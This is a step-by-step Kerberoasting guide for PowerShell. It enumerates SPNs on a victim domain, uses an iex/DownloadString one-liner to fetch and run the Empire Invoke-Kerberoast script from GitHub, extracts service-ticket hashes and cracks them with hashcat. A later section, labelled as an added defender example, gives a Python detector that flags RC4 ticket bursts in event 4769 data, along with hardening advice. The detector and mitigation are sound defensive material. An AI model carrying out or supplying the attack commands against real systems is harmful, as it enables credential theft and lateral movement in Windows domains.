Kerberoasting using PowerShell
Overview
This requests a service ticket for an account with a registered SPN and extracts the ticket hash using PowerShell, so the hash can be cracked offline.
Requirements
- You have access to the victim's Windows machine
- PowerShell is installed
Steps
- Extract SPNs (the mapping between services and the accounts that run them); `-T` names the domain to query and `-Q */*` lists every registered SPN:

```powershell
setspn -T medin -Q */*
```

- Get the PowerShell script:

```powershell
iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1')
```

- Run the script and copy the hash to the attacker's machine:

```powershell
Invoke-Kerberoast -OutputFormat hashcat | fl
```
- Sample output
- Crack the hash with hashcat (mode 13100: Kerberos 5, etype 23, TGS-REP):

```shell
hashcat -m 13100 -a 0 hash.txt wordlist --force
```
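Detection of the activity described in these steps, as an added defender-side example that is not part of the original how-to: Windows Security event 4769 records the encryption type of every service ticket issued, and RC4 tickets (etype 0x17, the input to hashcat mode 13100 above) requested by one principal for many SPN-backed accounts is what the `*/*` enumeration followed by Invoke-Kerberoast looks like in the KDC's log. Field names follow event 4769; the account names, addresses and the `ev` helper are constructed sample data.

```python
"""Flag Kerberoasting-style TGS requests in Windows Security event 4769 records."""
from collections import defaultdict

RC4_HMAC = "0x17"    # etype 23: the ticket type the hashcat 13100 step cracks
BURST_THRESHOLD = 5  # distinct SPN-backed accounts requested by one principal

def ev(user, service, etype, ip="::ffff:10.0.0.25", status="0x0"):
    """Build a record shaped like the 4769 fields we need (constructed sample data)."""
    return {"TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": etype, "IpAddress": ip, "Status": status}

# Constructed sample events: one TGS request per line, not real telemetry.
SAMPLE_EVENTS = [
    ev("jdoe@CORP.LOCAL", "svc_sql", "0x17"),
    ev("jdoe@CORP.LOCAL", "svc_web", "0x17"),
    ev("jdoe@CORP.LOCAL", "svc_backup", "0x17"),
    ev("jdoe@CORP.LOCAL", "svc_sccm", "0x17"),
    ev("jdoe@CORP.LOCAL", "svc_exchange", "0x17"),
    ev("jdoe@CORP.LOCAL", "WS01$", "0x17"),                  # machine account: ignored
    ev("alice@CORP.LOCAL", "svc_web", "0x12"),               # AES256 ticket: expected
    ev("alice@CORP.LOCAL", "svc_sql", "0x17"),               # one RC4 ticket: below threshold
    ev("WS02$@CORP.LOCAL", "krbtgt", "0x12"),                # TGT renewal: ignored
    ev("bob@CORP.LOCAL", "svc_sql", "0x17", status="0x20"),  # failed request: ignored
]

def is_user_service_account(name):
    """Kerberoasting targets SPNs on user accounts; skip computers ($) and krbtgt."""
    return not name.endswith("$") and name.lower() != "krbtgt"

def rc4_service_tickets(events):
    """Successful 4769 events where an RC4 ticket was issued for a user-type service account."""
    return [e for e in events
            if e["Status"] == "0x0"
            and e["TicketEncryptionType"].lower() == RC4_HMAC
            and is_user_service_account(e["ServiceName"])]

def bursting_requesters(events, threshold=BURST_THRESHOLD):
    """Requesters that pulled RC4 tickets for at least `threshold` distinct service accounts."""
    seen = defaultdict(set)
    for e in rc4_service_tickets(events):
        seen[e["TargetUserName"]].add(e["ServiceName"])
    return {user: sorted(svcs) for user, svcs in seen.items() if len(svcs) >= threshold}

if __name__ == "__main__":
    for user, services in bursting_requesters(SAMPLE_EVENTS).items():
        print(f"ALERT {user} requested RC4 tickets for {len(services)} services: {services}")
```

Service accounts that hold only AES keys and use long random passwords (or gMSAs) leave nothing useful for mode 13100 to crack, and an AES-only estate also turns any remaining RC4 request into a much stronger signal.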